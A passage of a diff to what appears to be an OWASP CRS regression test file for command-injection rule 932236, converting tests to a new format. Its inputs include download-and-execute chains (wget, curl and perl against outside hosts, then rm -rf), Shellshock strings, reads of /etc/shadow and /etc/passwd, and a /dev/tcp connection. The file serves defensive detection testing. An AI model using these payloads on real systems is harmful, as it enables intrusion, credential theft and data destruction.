keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 22 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 23 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 24 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 25 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 26 desc: RCE from test 932236.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 27 desc: RCE from test 932236.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 28 desc: RCE from test 932236.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 29 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 30 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 31 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 32 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 34 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 36 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 37 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 38 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 39 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-40 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-41 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-42 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 40 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + log_contains: id "932236" + - test_id: 41 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "932236" + - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-43 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 43 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-44 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 